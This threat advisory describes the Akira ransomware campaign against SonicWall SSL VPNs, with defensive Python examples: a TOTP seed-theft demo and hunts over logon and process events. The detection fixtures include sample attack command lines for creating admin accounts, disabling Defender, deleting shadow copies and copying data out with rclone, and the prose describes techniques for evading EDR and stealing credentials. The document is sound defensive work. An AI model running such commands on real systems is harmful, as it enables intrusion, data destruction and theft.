In a rapidly escalating campaign, the Akira ransomware group has launched a series of opportunistic, high-speed intrusions targeting SonicWall SSL VPNs. First observed in late July 2025, these attacks are characterized by their minimal dwell time, often less than one hour, and a consistent playbook of credential-based access, lateral movement, and ransomware deployment. The campaign has impacted organizations across various sectors, with Arctic Wolf Labs confirming active exploitation through September 2025.
Severity: High
Threat Details
1. Targeted Technology
- SonicWall SSL VPN appliances
- Models affected: NSa 2600, 2700, 4650, 5700; TZ370, TZ470
- SonicOS versions impacted: 6.5.5.1 to 7.3.0
- Linked CVE: CVE-2024-40766 (Improper Access Control)
2. Initial Access
- Threat actors gain access via SSL VPN logins originating from VPS hosting providers.
- Use of valid credentials, likely harvested during prior exploitation of CVE-2024-40766.
- Accounts with OTP-based MFA enabled were also breached, which suggests the OTP seed material (the shared secret from which valid one-time codes are computed) was compromised along with the passwords.
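The following is an added example, not code from the advisory or from Arctic Wolf, showing why possession of the OTP seed is equivalent to possession of the second factor: it implements RFC 6238 TOTP (on top of RFC 4226 HOTP) with the standard library only, and shows that a verifier cannot distinguish a code computed from a stolen copy of the seed. The seed is the RFC 6238 test-vector secret, not a real enrolment; the "stolen seed" scenario is constructed.

```python
"""Why a stolen OTP seed defeats OTP-based MFA (added example, not from the advisory).

Implements RFC 4226 HOTP and RFC 6238 TOTP with only the standard library.
ENROLLED_SEED is the RFC 6238 Appendix B test-vector secret, not a real
enrolment; STOLEN_SEED models an attacker-held copy of that seed.
"""
import hashlib
import hmac
import struct
import time


def hotp(seed: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(seed: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP where the counter is the current 30-second time window."""
    return hotp(seed, unix_time // step, digits)


def verify_totp(seed: bytes, code: str, unix_time: int, window: int = 1, step: int = 30) -> bool:
    """Server-side check accepting +/- `window` steps of clock drift, compared in constant time."""
    for drift in range(-window, window + 1):
        if hmac.compare_digest(totp(seed, unix_time + drift * step, step), code):
            return True
    return False


# RFC 6238 Appendix B test-vector secret (ASCII "12345678901234567890").
ENROLLED_SEED = b"12345678901234567890"

# Constructed scenario: the attacker holds a byte-for-byte copy of the seed
# (for example from a leaked configuration backup) and nothing else.
STOLEN_SEED = bytes(ENROLLED_SEED)


def attacker_code_is_accepted(unix_time: int) -> bool:
    """The legitimate verifier accepts a code computed purely from the stolen copy."""
    return verify_totp(ENROLLED_SEED, totp(STOLEN_SEED, unix_time), unix_time)


if __name__ == "__main__":
    now = int(time.time())
    print("code from stolen seed:", totp(STOLEN_SEED, now),
          "accepted by verifier:", attacker_code_is_accepted(now))
```

Because the code is a deterministic function of the seed and the clock, rotating passwords alone does nothing against an attacker who holds the seed; the OTP enrolment itself has to be revoked and re-issued.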
3. Discovery & Lateral Movement
- Port and Host Scanning:
- Conducted via SoftPerfect Network Scanner and Advanced IP Scanner.
- Tools were deployed to compromised Windows hosts in %Temp%, Desktop, Downloads directories.
- Scanning focused on key services: SMB (445), NetBIOS (137), RPC (135), SQL (1433).
- SMB-Based Discovery via Impacket:
- Use of the Python Impacket library was confirmed via SMBv2 session signatures.
- SMB session setup requests originated from hostnames such as: WINUTIL, kali, DESKTOP-HPLM2TD, WIN-V1L65ED9I55, etc.
- Event IDs observed: 4624 (successful logon, type 3 network logon, consistent with SMB session setup) and 4625 (failed logon, type 3). Note that logon type 3 covers any network logon, so the SMB attribution comes from the accompanying session signatures rather than from the event alone.
- Lateral Movement via RDP:
- Remote Desktop Protocol (RDP) was used for hands-on-keyboard access.
- Logon events indicated usage of type 10 (remote interactive) sessions.
- Active Directory enumeration was performed with built-in tools (nltest, dsquery) and PowerShell cmdlets such as Get-ADUser and Get-ADComputer; the output was redirected to local text files (e.g., C:\ProgramData\AdUsers.txt) for later collection.
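The following is an added example, not code from the advisory or from Arctic Wolf, of hunting logic over Security-log logon events for the pattern described in this section: runs of failed type 3 logons from one source, successful type 3 (SMB) logons, and type 10 (RDP) logons whose client-supplied workstation name is not in the asset inventory. The events and the inventory are constructed samples; the field names mirror the 4624/4625 event data fields, and the workstation names are the ones the advisory lists.

```python
"""Hunt logon events for the SMB discovery / RDP lateral-movement pattern (added example).

Records are constructed samples shaped like the relevant fields of Windows
Security events 4624 and 4625. KNOWN_HOSTS is a constructed asset inventory;
an organisation would substitute its own.
"""
from collections import defaultdict

# Constructed asset inventory: workstation names a domain-joined client presents.
KNOWN_HOSTS = {"DC01", "FS01", "WS-ALICE", "WS-BOB"}

# Constructed sample events (not real telemetry). The unknown workstation names
# are those the advisory observed in SMB session setup requests.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "WorkstationName": "WS-ALICE", "IpAddress": "10.0.1.10",
     "TargetUserName": "alice", "Computer": "FS01"},
    {"EventID": 4625, "LogonType": 3, "WorkstationName": "kali", "IpAddress": "10.0.9.50",
     "TargetUserName": "administrator", "Computer": "FS01"},
    {"EventID": 4625, "LogonType": 3, "WorkstationName": "kali", "IpAddress": "10.0.9.50",
     "TargetUserName": "backup", "Computer": "FS01"},
    {"EventID": 4625, "LogonType": 3, "WorkstationName": "kali", "IpAddress": "10.0.9.50",
     "TargetUserName": "svc_sql", "Computer": "FS01"},
    {"EventID": 4624, "LogonType": 3, "WorkstationName": "WINUTIL", "IpAddress": "10.0.9.50",
     "TargetUserName": "svc_sql", "Computer": "FS01"},
    {"EventID": 4624, "LogonType": 10, "WorkstationName": "DESKTOP-HPLM2TD", "IpAddress": "10.0.9.50",
     "TargetUserName": "svc_sql", "Computer": "DC01"},
]


def is_unknown_workstation(name, inventory=KNOWN_HOSTS):
    """True when the client-supplied workstation name is not a known asset (case-insensitive)."""
    return bool(name) and name.upper() not in {h.upper() for h in inventory}


def hunt_logons(events, inventory=KNOWN_HOSTS, fail_threshold=3):
    """Return findings in event order.

    - repeated_smb_failures: `fail_threshold` failed type 3 logons from one
      (IP, workstation) source, with the set of user names tried so far.
    - smb_logon_unknown_workstation: successful type 3 logon from a host
      that is not in the inventory (Impacket-style clients send their own name).
    - rdp_logon_unknown_workstation: successful type 10 logon from such a host.
    """
    findings = []
    failed_by_source = defaultdict(int)
    users_by_source = defaultdict(set)
    for e in events:
        eid, ltype = e["EventID"], e["LogonType"]
        src = (e.get("IpAddress", ""), e.get("WorkstationName", ""))
        unknown = is_unknown_workstation(src[1], inventory)
        if eid == 4625 and ltype == 3:
            failed_by_source[src] += 1
            users_by_source[src].add(e["TargetUserName"])
            if failed_by_source[src] == fail_threshold:
                findings.append({"rule": "repeated_smb_failures", "source": src,
                                 "users": sorted(users_by_source[src]), "target": e["Computer"]})
        elif eid == 4624 and ltype == 3 and unknown:
            findings.append({"rule": "smb_logon_unknown_workstation", "source": src,
                             "user": e["TargetUserName"], "target": e["Computer"]})
        elif eid == 4624 and ltype == 10 and unknown:
            findings.append({"rule": "rdp_logon_unknown_workstation", "source": src,
                             "user": e["TargetUserName"], "target": e["Computer"]})
    return findings


if __name__ == "__main__":
    for f in hunt_logons(SAMPLE_EVENTS):
        print(f)
```

The workstation-name check is cheap and high-signal because the name is chosen by the SMB/RDP client, not resolved by the server: a domain-joined Windows host presents its own computer name, whereas tooling run from an attacker's box presents whatever that box is called.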
4. Credential Access & Persistence
- Backup system access: custom PowerShell scripts were used to extract Veeam credentials from the backing MSSQL/PostgreSQL database and decrypt the stored secrets.
- Persistence techniques:
- Creation of local and domain administrator accounts (e.g., sqlbackup, veean) with net.exe.
- Deployment of RMM tools like AnyDesk, TeamViewer, and RustDesk.
5. Defense Evasion
- Disabled the victim's existing RMM tools (e.g., Splashtop) and Windows Defender via PowerShell.
- Used BYOVD techniques (e.g., consent.exe + malicious DLL + vulnerable driver).
- Employed ACL tampering at the kernel level to neutralize EDR processes.
- Deleted shadow copies and modified UAC registry settings for elevated remote access.
- Applied geofencing via locale checks to avoid systems in Eastern Europe/Central Asia.
6. Data Staging & Exfiltration
- Used WinRAR to package data (split archives, filtered by file types and date).
- Exfiltrated data using rclone and FileZilla to attacker-controlled VPS servers.
7. Ransomware Deployment
- Ransomware binaries (akira.exe, locker.exe) executed per-drive or via share list.
- Encryption was initiated within four hours of initial access, and in as little as 55 minutes.
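The following is an added example, not code from the advisory or from Arctic Wolf, of command-line hunting rules over process-creation telemetry for the tooling named in sections 4 to 7: account creation with net.exe, shadow copy deletion, Defender being disabled from PowerShell, WinRAR split archives, rclone transfers, and the ransomware binary names. The records are constructed samples shaped like the command-line fields of Security event 4688 / Sysmon event 1. The advisory does not state which PowerShell command was used against Defender; the Set-MpPreference rule is an assumption based on the common route, and the WinRAR switches in the sample line are illustrative.

```python
"""Hunt process-creation records for the persistence, evasion, staging and
deployment tooling in sections 4 to 7 (added example, not from the advisory).

Records are constructed samples with the shape of 4688 / Sysmon event 1 fields.
"""
import re

RULES = [
    # Section 4: local/domain admin accounts created with net.exe
    ("net_user_add", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("net_admin_group_add", re.compile(
        r'\bnet1?(\.exe)?\s+(localgroup|group)\s+"?[^"/]*admin[^"/]*"?\s+\S+\s+/add\b', re.I)),
    # Section 5: Defender disabled via PowerShell (assumed cmdlet; advisory names none)
    ("defender_disabled", re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$?true", re.I)),
    # Section 5: shadow copy deletion
    ("shadow_copy_delete", re.compile(
        r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)),
    # Section 6: WinRAR archive creation split into volumes (-v<size>)
    ("winrar_split_archive", re.compile(r'\b(win)?rar(\.exe)?"?\s+a\b.*\s-v\d+[kmg]?\b', re.I)),
    # Section 6: rclone pushing data to a remote
    ("rclone_transfer", re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    # Section 7: ransomware binary names reported in the advisory
    ("ransomware_binary", re.compile(r"(^|\\)(akira|locker)\.exe\b", re.I)),
]

# Constructed sample records (not real telemetry). Switch values are illustrative.
SAMPLE_PROCESSES = [
    {"Computer": "FS01", "User": "CORP\\svc_sql",
     "CommandLine": "net user sqlbackup Sup3rS3cret! /add"},
    {"Computer": "FS01", "User": "CORP\\svc_sql",
     "CommandLine": "net localgroup administrators sqlbackup /add"},
    {"Computer": "FS01", "User": "CORP\\sqlbackup",
     "CommandLine": "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"Computer": "FS01", "User": "CORP\\sqlbackup",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Computer": "FS01", "User": "CORP\\sqlbackup",
     "CommandLine": '"C:\\Program Files\\WinRAR\\Rar.exe" a -v500m -ta20250101 finance.rar D:\\Shares\\Finance'},
    {"Computer": "FS01", "User": "CORP\\sqlbackup",
     "CommandLine": "rclone.exe copy D:\\Staging remote:backup --transfers 8"},
    {"Computer": "FS01", "User": "CORP\\sqlbackup",
     "CommandLine": "C:\\ProgramData\\akira.exe"},
    {"Computer": "WS-ALICE", "User": "CORP\\alice",          # benign: should not match
     "CommandLine": "net use Z: \\\\FS01\\share"},
]


def hunt_processes(records, rules=RULES):
    """Return one finding per (record, rule) match, in record order."""
    findings = []
    for r in records:
        cmd = r.get("CommandLine", "")
        for name, pattern in rules:
            if pattern.search(cmd):
                findings.append({"rule": name, "computer": r.get("Computer"),
                                 "user": r.get("User"), "cmd": cmd})
    return findings


if __name__ == "__main__":
    for f in hunt_processes(SAMPLE_PROCESSES):
        print(f["rule"], f["computer"], f["user"], "::", f["cmd"])
```

Any one of these rules fires in legitimate administration too; the value is in the sequence on one host within an hour, which is the dwell time the advisory reports, so the rule names are worth correlating per computer rather than alerting on individually.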
Recommendations
- Patch SonicWall devices urgently, especially against CVE-2024-40766.
- It is recommended to reset all SSL VPN credentials on SonicWall devices that have ever run firmware vulnerable to CVE-2024-40766, as well as Active Directory credentials on accounts used for SSL VPN access and LDAP synchronization.
- Organizations should consider SonicWall’s guidance on the MySonicWall cloud backup file incident and determine on a case-by-case basis if any serial numbers were affected.
- Organizations using the MySonicWall cloud backup feature are strongly advised to reset credentials as instructed by SonicWall.
- Block EXE/DLL/SYS/MSI/script execution from user-writable directories such as %ProgramData%, %TEMP%, %Users%\Downloads, and %PUBLIC%. Allow only explicitly approved updaters where necessary.
- Only permit execution of signed code from approved vendors and product families.
- Prevent unsigned or known-vulnerable drivers (e.g., sys, churchill_driver.sys, etc.) from loading, even when the load is requested with administrative rights.
- Explicitly deny execution of RMM and tunneling utilities (AnyDesk, RustDesk, Cloudflared) unless explicitly sanctioned and allowlisted.
- Block the published IOCs at the relevant network and endpoint controls:
https://www.virustotal.com/gui/collection/b986d6e26ab8c80d1b8ebf6d3e85c14f8854080c5c40a20bcb3daf93c9dd1b06/iocs
Source: